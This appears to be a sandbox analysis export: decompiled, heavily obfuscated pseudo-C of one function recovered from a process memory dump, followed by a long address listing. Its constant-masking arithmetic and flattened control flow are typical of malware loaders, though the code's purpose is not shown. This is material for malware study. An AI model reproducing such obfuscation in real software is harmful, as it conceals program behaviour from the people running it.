				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E007ADCF7(_v396, 0x791884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E007ADCF7(_v152, 0x791924, __eflags);
								_v76 = _v124;
								_t735 = E0079CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00798D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0079A8B0(_v296, _t866, _v196);
								E0079A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x7b3dfc; // 0x0
									E007A8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E007ADCF7(_v372, 0x791904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x7b3dfc; // 0x0
											_t754 =  *0x7b3dfc; // 0x0
											_t755 =  *0x7b3dfc; // 0x0
											_t757 = E007AD84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0079A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E007ADCF7(_v108, 0x7918b4, _t882);
												_pop(_t812);
												_t760 =  *0x7b3dfc; // 0x0
												E007B0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0079A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E007ADCF7(_v324, 0x7918e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E007ADCF7(_v240, 0x791814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00799462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0079A8B0(_v216, _t717, _v224);
							E0079A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x7b3dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00797FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x7b3dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0079957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                          0x00792bd9
                                                                                                                          0x00792bdf
                                                                                                                          0x00792bee
                                                                                                                          0x00792bf0
                                                                                                                          0x00792bf7
                                                                                                                          0x00792bfe
                                                                                                                          0x00792c03
                                                                                                                          0x00792c0a
                                                                                                                          0x00792c12
                                                                                                                          0x00792c1a
                                                                                                                          0x00792c22
                                                                                                                          0x00792c2a
                                                                                                                          0x00792c35
                                                                                                                          0x00792c40
                                                                                                                          0x00792c4b
                                                                                                                          0x00792c56
                                                                                                                          0x00792c61
                                                                                                                          0x00792c6c
                                                                                                                          0x00792c77
                                                                                                                          0x00792c88
                                                                                                                          0x00792c89
                                                                                                                          0x00792c8d
                                                                                                                          0x00792c92
                                                                                                                          0x00792c9a
                                                                                                                          0x00792ca2
                                                                                                                          0x00792cad
                                                                                                                          0x00792cb8
                                                                                                                          0x00792cc3
                                                                                                                          0x00792cce
                                                                                                                          0x00792cd9
                                                                                                                          0x00792ce1
                                                                                                                          0x00792cec
                                                                                                                          0x00792cf7
                                                                                                                          0x00792cff
                                                                                                                          0x00792d04
                                                                                                                          0x00792d09
                                                                                                                          0x00792d11
                                                                                                                          0x00792d1c
                                                                                                                          0x00792d2e
                                                                                                                          0x00792d35
                                                                                                                          0x00792d40
                                                                                                                          0x00792d48
                                                                                                                          0x00792d50
                                                                                                                          0x00792d5d
                                                                                                                          0x00792d61
                                                                                                                          0x00792d69
                                                                                                                          0x00792d76
                                                                                                                          0x00792d80
                                                                                                                          0x00792d84
                                                                                                                          0x00792d8c
                                                                                                                          0x00792d94
                                                                                                                          0x00792d9c
                                                                                                                          0x00792da9
                                                                                                                          0x00792dad
                                                                                                                          0x00792db5
                                                                                                                          0x00792dc0
                                                                                                                          0x00792dc8
                                                                                                                          0x00792dd3
                                                                                                                          0x00792dde
                                                                                                                          0x00792de9
                                                                                                                          0x00792df4
                                                                                                                          0x00792dff
                                                                                                                          0x00792e07
                                                                                                                          0x00792e0b
                                                                                                                          0x00792e13
                                                                                                                          0x00792e1d
                                                                                                                          0x00792e29
                                                                                                                          0x00792e2e
                                                                                                                          0x00792e34
                                                                                                                          0x00792e39
                                                                                                                          0x00792e41
                                                                                                                          0x00792e49
                                                                                                                          0x00792e54
                                                                                                                          0x00792e5f
                                                                                                                          0x00792e6a
                                                                                                                          0x00792e75
                                                                                                                          0x00792e80
                                                                                                                          0x00792e8b
                                                                                                                          0x00792e96
                                                                                                                          0x00792ea1
                                                                                                                          0x00792eac
                                                                                                                          0x00792eb7
                                                                                                                          0x00792ec2
                                                                                                                          0x00792ed5
                                                                                                                          0x00792ed6
                                                                                                                          0x00792edd
                                                                                                                          0x00792ee8
                                                                                                                          0x00792ef3
                                                                                                                          0x00792f06
                                                                                                                          0x00792f0d
                                                                                                                          0x00792f18
                                                                                                                          0x00792f2c
                                                                                                                          0x00792f33
                                                                                                                          0x00792f3e
                                                                                                                          0x00792f46
                                                                                                                          0x00792f4e
                                                                                                                          0x00792f53
                                                                                                                          0x00792f58
                                                                                                                          0x00792f60
                                                                                                                          0x00792f6b
                                                                                                                          0x00792f7e
                                                                                                                          0x00792f85
                                                                                                                          0x00792f90
                                                                                                                          0x00792fa3
                                                                                                                          0x00792fb2
                                                                                                                          0x00792fb9
                                                                                                                          0x00792fc4
                                                                                                                          0x00792fcf
                                                                                                                          0x00792fda
                                                                                                                          0x00792fe5
                                                                                                                          0x00792ff0
                                                                                                                          0x00792ffb
                                                                                                                          0x00793006
                                                                                                                          0x0079300e
                                                                                                                          0x00793016
                                                                                                                          0x0079301b
                                                                                                                          0x00793023
                                                                                                                          0x0079302b
                                                                                                                          0x00793036
                                                                                                                          0x00793041
                                                                                                                          0x0079304c
                                                                                                                          0x00793057
                                                                                                                          0x00793062
                                                                                                                          0x0079306d
                                                                                                                          0x00793078
                                                                                                                          0x00793083
                                                                                                                          0x0079308e
                                                                                                                          0x00793096
                                                                                                                          0x007930a3
                                                                                                                          0x007930a7
                                                                                                                          0x007930af
                                                                                                                          0x007930b7
                                                                                                                          0x007930bf
                                                                                                                          0x007930c7
                                                                                                                          0x007930cf
                                                                                                                          0x007930d7
                                                                                                                          0x007930df
                                                                                                                          0x007930e9
                                                                                                                          0x007930ee
                                                                                                                          0x007930f6
                                                                                                                          0x007930fb
                                                                                                                          0x00793103
                                                                                                                          0x0079310e
                                                                                                                          0x00793119
                                                                                                                          0x00793121
                                                                                                                          0x0079312c
                                                                                                                          0x00793141
                                                                                                                          0x00793144
                                                                                                                          0x0079314b
                                                                                                                          0x00793156
                                                                                                                          0x00793169
                                                                                                                          0x00793170
                                                                                                                          0x0079317b
                                                                                                                          0x00793191
                                                                                                                          0x00793198
                                                                                                                          0x007931a3
                                                                                                                          0x007931ab
                                                                                                                          0x007931b0
                                                                                                                          0x007931b4
                                                                                                                          0x007931bc
                                                                                                                          0x007931c4
                                                                                                                          0x007931cc
                                                                                                                          0x007931d4
                                                                                                                          0x007931dc
                                                                                                                          0x007931e4
                                                                                                                          0x007931f4
                                                                                                                          0x007931fc
                                                                                                                          0x00793201
                                                                                                                          0x00793207
                                                                                                                          0x0079320f
                                                                                                                          0x00793221
                                                                                                                          0x00793226
                                                                                                                          0x0079322f
                                                                                                                          0x0079323a
                                                                                                                          0x00793242
                                                                                                                          0x0079324a
                                                                                                                          0x00793252
                                                                                                                          0x0079325a
                                                                                                                          0x00793265
                                                                                                                          0x0079326d
                                                                                                                          0x00793278
                                                                                                                          0x00793284
                                                                                                                          0x00793289
                                                                                                                          0x00793293
                                                                                                                          0x00793298
                                                                                                                          0x007932a2
                                                                                                                          0x007932a5
                                                                                                                          0x007932a9
                                                                                                                          0x007932b1
                                                                                                                          0x007932c2
                                                                                                                          0x007932c5
                                                                                                                          0x007932cc
                                                                                                                          0x007932d7
                                                                                                                          0x007932e2
                                                                                                                          0x007932ed
                                                                                                                          0x007932f8
                                                                                                                          0x00793303
                                                                                                                          0x0079330b
                                                                                                                          0x00793313
                                                                                                                          0x0079331b
                                                                                                                          0x00793323
                                                                                                                          0x0079332b
                                                                                                                          0x00793336
                                                                                                                          0x00793341
                                                                                                                          0x0079334c
                                                                                                                          0x00793357
                                                                                                                          0x0079335e
                                                                                                                          0x00793369
                                                                                                                          0x00793371
                                                                                                                          0x00793379
                                                                                                                          0x00793381
                                                                                                                          0x00793389
                                                                                                                          0x00793394
                                                                                                                          0x007933a7
                                                                                                                          0x007933ae
                                                                                                                          0x007933b9
                                                                                                                          0x007933c1
                                                                                                                          0x007933c6
                                                                                                                          0x007933cb
                                                                                                                          0x007933d3
                                                                                                                          0x007933db
                                                                                                                          0x007933e0
                                                                                                                          0x007933e8
                                                                                                                          0x007933f0
                                                                                                                          0x007933f8
                                                                                                                          0x00793403
                                                                                                                          0x0079340e
                                                                                                                          0x00793416
                                                                                                                          0x00793421
                                                                                                                          0x0079342d
                                                                                                                          0x00793430
                                                                                                                          0x00793434
                                                                                                                          0x0079343c
                                                                                                                          0x00793444
                                                                                                                          0x0079344c
                                                                                                                          0x00793454
                                                                                                                          0x00793459
                                                                                                                          0x00793461
                                                                                                                          0x00793466
                                                                                                                          0x0079346e
                                                                                                                          0x00793479
                                                                                                                          0x00793484
                                                                                                                          0x0079348f
                                                                                                                          0x0079349a
                                                                                                                          0x007934a5
                                                                                                                          0x007934ad
                                                                                                                          0x007934b8
                                                                                                                          0x007934c3
                                                                                                                          0x007934ce
                                                                                                                          0x007934d9
                                                                                                                          0x007934e4
                                                                                                                          0x007934ec
                                                                                                                          0x007934f1
                                                                                                                          0x007934f6
                                                                                                                          0x007934fe
                                                                                                                          0x00793506
                                                                                                                          0x00793511
                                                                                                                          0x0079351c
                                                                                                                          0x00793527
                                                                                                                          0x00793532
                                                                                                                          0x0079353d
                                                                                                                          0x0079354a
                                                                                                                          0x00793555
                                                                                                                          0x0079355a
                                                                                                                          0x00793565
                                                                                                                          0x0079356a
                                                                                                                          0x00793575
                                                                                                                          0x00793580
                                                                                                                          0x00793588
                                                                                                                          0x00793593
                                                                                                                          0x0079359e
                                                                                                                          0x007935a9
                                                                                                                          0x007935b4
                                                                                                                          0x007935bf
                                                                                                                          0x007935d4
                                                                                                                          0x007935d5
                                                                                                                          0x007935e0
                                                                                                                          0x007935e7
                                                                                                                          0x007935f2
                                                                                                                          0x007935fd
                                                                                                                          0x00793608
                                                                                                                          0x00793613
                                                                                                                          0x0079361e
                                                                                                                          0x00793629
                                                                                                                          0x00793634
                                                                                                                          0x0079363c
                                                                                                                          0x00793647
                                                                                                                          0x00793652
                                                                                                                          0x0079365f
                                                                                                                          0x00793668
                                                                                                                          0x0079366c
                                                                                                                          0x00793674
                                                                                                                          0x0079367c
                                                                                                                          0x00793687
                                                                                                                          0x00793692
                                                                                                                          0x0079369d
                                                                                                                          0x007936b0
                                                                                                                          0x007936b7
                                                                                                                          0x007936c2
                                                                                                                          0x007936cd
                                                                                                                          0x007936d8
                                                                                                                          0x007936e3
                                                                                                                          0x007936ee
                                                                                                                          0x007936f9
                                                                                                                          0x00793701
                                                                                                                          0x0079370c
                                                                                                                          0x00793714
                                                                                                                          0x00793722
                                                                                                                          0x00793726
                                                                                                                          0x0079372e
                                                                                                                          0x00793736
                                                                                                                          0x00793741
                                                                                                                          0x0079374c
                                                                                                                          0x00793757
                                                                                                                          0x00793757
                                                                                                                          0x00793757
                                                                                                                          0x0079375c
                                                                                                                          0x00793761
                                                                                                                          0x00793766
                                                                                                                          0x00793766
                                                                                                                          0x00793766
                                                                                                                          0x00793766
                                                                                                                          0x00793768
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079376e
                                                                                                                          0x0079392a
                                                                                                                          0x00793936
                                                                                                                          0x00793941
                                                                                                                          0x00793946
                                                                                                                          0x0079394f
                                                                                                                          0x00793951
                                                                                                                          0x0079395c
                                                                                                                          0x00793973
                                                                                                                          0x0079398c
                                                                                                                          0x00793998
                                                                                                                          0x007939b5
                                                                                                                          0x007939c3
                                                                                                                          0x007939d1
                                                                                                                          0x007939e0
                                                                                                                          0x007939fd
                                                                                                                          0x00793a1c
                                                                                                                          0x00793a23
                                                                                                                          0x00793a2f
                                                                                                                          0x00793a43
                                                                                                                          0x00793a46
                                                                                                                          0x00793a58
                                                                                                                          0x00793a5f
                                                                                                                          0x00000000
                                                                                                                          0x00793774
                                                                                                                          0x0079377a
                                                                                                                          0x00793907
                                                                                                                          0x0079391d
                                                                                                                          0x00793923
                                                                                                                          0x00793757
                                                                                                                          0x00793757
                                                                                                                          0x00793757
                                                                                                                          0x0079375c
                                                                                                                          0x00793761
                                                                                                                          0x00000000
                                                                                                                          0x00793761
                                                                                                                          0x00793780
                                                                                                                          0x00793786
                                                                                                                          0x007938fd
                                                                                                                          0x00000000
                                                                                                                          0x0079378c
                                                                                                                          0x0079378e
                                                                                                                          0x00793829
                                                                                                                          0x00793835
                                                                                                                          0x00793845
                                                                                                                          0x00793847
                                                                                                                          0x0079384b
                                                                                                                          0x0079385a
                                                                                                                          0x00793868
                                                                                                                          0x00793869
                                                                                                                          0x00793870
                                                                                                                          0x007938a5
                                                                                                                          0x007938bb
                                                                                                                          0x007938cb
                                                                                                                          0x007938d0
                                                                                                                          0x007938d3
                                                                                                                          0x007938d7
                                                                                                                          0x007938e0
                                                                                                                          0x007938d9
                                                                                                                          0x007938db
                                                                                                                          0x007938dd
                                                                                                                          0x007938dd
                                                                                                                          0x007938f2
                                                                                                                          0x00000000
                                                                                                                          0x00793794
                                                                                                                          0x00793794
                                                                                                                          0x00793796
                                                                                                                          0x0079379c
                                                                                                                          0x007937a8
                                                                                                                          0x007937b3
                                                                                                                          0x007937b9
                                                                                                                          0x007937e4
                                                                                                                          0x007937fe
                                                                                                                          0x0079381c
                                                                                                                          0x0079381f
                                                                                                                          0x00793b98
                                                                                                                          0x00793b98
                                                                                                                          0x00793b9b
                                                                                                                          0x00793b9b
                                                                                                                          0x00793ba0
                                                                                                                          0x00793ba5
                                                                                                                          0x00793baa
                                                                                                                          0x00793baa
                                                                                                                          0x00793796
                                                                                                                          0x00000000
                                                                                                                          0x0079378e
                                                                                                                          0x00793786
                                                                                                                          0x0079377a
                                                                                                                          0x00793aa7
                                                                                                                          0x00793ab1
                                                                                                                          0x00793ab1
                                                                                                                          0x00793a69
                                                                                                                          0x00793a6f
                                                                                                                          0x00793aef
                                                                                                                          0x00793afb
                                                                                                                          0x00793b03
                                                                                                                          0x00793b08
                                                                                                                          0x00793b16
                                                                                                                          0x00793b24
                                                                                                                          0x00793b3e
                                                                                                                          0x00793b68
                                                                                                                          0x00793b76
                                                                                                                          0x00793b79
                                                                                                                          0x00793b8e
                                                                                                                          0x00793b93
                                                                                                                          0x00000000
                                                                                                                          0x00793a71
                                                                                                                          0x00793a71
                                                                                                                          0x00793a73
                                                                                                                          0x00793ac7
                                                                                                                          0x00793acd
                                                                                                                          0x00793ace
                                                                                                                          0x00793ad9
                                                                                                                          0x00793add
                                                                                                                          0x00793ae2
                                                                                                                          0x00793ae4
                                                                                                                          0x00793ae7
                                                                                                                          0x00000000
                                                                                                                          0x00793a75
                                                                                                                          0x00793a75
                                                                                                                          0x00793a77
                                                                                                                          0x00000000
                                                                                                                          0x00793a7d
                                                                                                                          0x00793a7d
                                                                                                                          0x00793a9d
                                                                                                                          0x00793aa2
                                                                                                                          0x00793a77
                                                                                                                          0x00793a73
                                                                                                                          0x00000000
                                                                                                                          0x00793baf
                                                                                                                          0x00793baf
                                                                                                                          0x00000000
                                                                                                                          0x00793bbb

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
